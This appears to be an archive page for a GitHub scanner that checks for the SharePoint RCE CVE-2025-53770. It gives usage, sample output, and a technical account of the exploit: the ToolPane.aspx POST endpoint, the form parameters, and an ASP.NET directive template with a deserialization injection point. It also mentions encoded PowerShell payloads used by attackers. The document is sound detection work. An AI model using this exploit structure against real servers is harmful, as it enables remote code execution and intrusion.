Associated Vulnerability
Title:Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)Description:Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Description
Scanner for the SharePoint CVE-2025-53770 RCE zero day vulnerability.
Readme
# CVE-2025-53770
This is a scanner for [the SharePoint unauthenticated Remote Code Execution vulnerability](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/), assigned CVE number CVE-2025-53770.
The code for this was written by reverse-engineering a payload seen in [the wild](https://raw.githubusercontent.com/kaizensecurity/CVE-2025-53770/refs/heads/master/payload).
Use at your own risk, I am not responsible for any negative impact this might cause.
## How does it work?
It tries to exploit the vulnerability by injecting [a marker](pkg/payload/test_payload.go) in the SharePoint ToolBox widget.
If in the SharePoint server response this unharmful marker is found, the host is marked as vulnerable.
## How to use
```zsh
# check if <TARGET-HOSTNAME> is vulnerable and try extract version information
% ./CVE-2025-53770 [<TARGET-HOSTNAME> ...]
INFO[0000] set log level fields.level=info
INFO[0000] starting scanner targets=1
INFO[0001] detected SharePoint version target=<REDACTED> version="MicrosoftSharePointTeamServices: 16.0.0.5469\n"
WARN[0001] target is vulnerable target=<REDACTED>
# turn on debug logging and try retrieving SharePoint version information
% ./CVE-2025-53770 -log=debug -version <TARGET-HOSTNAME>
...
```
## Who is vulnerable?
Anyone running the *on-prem* version of SharePoint server without KB5002768 & KB5002754.
## How does this vulnerability work?
The vulnerability presumably builds upon a previously disclosed vulnerability for SharePoint, CVE-2025-49706.
By sending a HTTP POST request to `https://<TARGET>/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx` with a GZIP-ed, BASE64-encoded payload, you can achieve Remote Code Execution as the SharePoint runtime process.
Two form parameters are important here:
1. `MSOTlPn_Uri`: Control source path
This pretends to reference a legitimate SharePoint control (AclEditor.ascx), and tricks SharePoint into allowing the web part edit.
This seems to be mock/fake value just to pass validation.
The original malicious payload includes `MSOTlPn_Uri=https://<TARGET>%s/_controltemplates/15/AclEditor.ascx`, but this does not seem to be used at this point.
2. `MSOTlPn_DWP`: Web partial configuration.
This parameter injects custom ASP.NET directives (`<%@ Register %>`) and server-side markup (`<Scorecard:ExcelDataSet>`).
The `CompressedDataTable` parameter holds attacker-controlled serialized data (GZIP + base64), triggering the RCE.
This payload follows a certain structure:
```xml
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="<PAYLOAD-GZIPPED-BASE64-ENCODED>" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>
```
If a control like `Scorecard:ExcelDataSet` exists and its `CompressedDataTable` property is set, it's deserialized directly by the SharePoint DWP Parser.
The payload itself can be rather interesting, as it can contain a `System.DelegateSerializationHolder` which triggers a deserialization RCE.
Threat actors abused this to pass `/c powershell -EncodedCommand <POWERSHELL-PAYLOAD>` in their payload to achieve code exection.
In our case, we merely pass a static placeholder to prove exploitability;
```xml
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
<foo>
<bar diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
<poc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<TestWrapper>
<Info>This is a harmless CVE-2025-53770 PoC marker.</Info>
<Timestamp>2025-07-21T14:04:52Z</Timestamp>
</TestWrapper>
</poc>
</bar>
</foo>
</diffgr:diffgram>
```
File Snapshot
[4.0K] /data/pocs/49715adffd94f2b96e5fe2cd2856b471148a8c37
├── [4.0K] cmd
│ └── [2.7K] main.go
├── [ 848] Dockerfile
├── [ 169] go.mod
├── [1.6K] go.sum
├── [ 48] Makefile
├── [4.0K] pkg
│ └── [4.0K] payload
│ ├── [2.4K] extract.go
│ ├── [3.5K] payload.go
│ ├── [1.7K] test.go
│ └── [ 685] test_payload.go
└── [4.4K] README.md
3 directories, 10 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →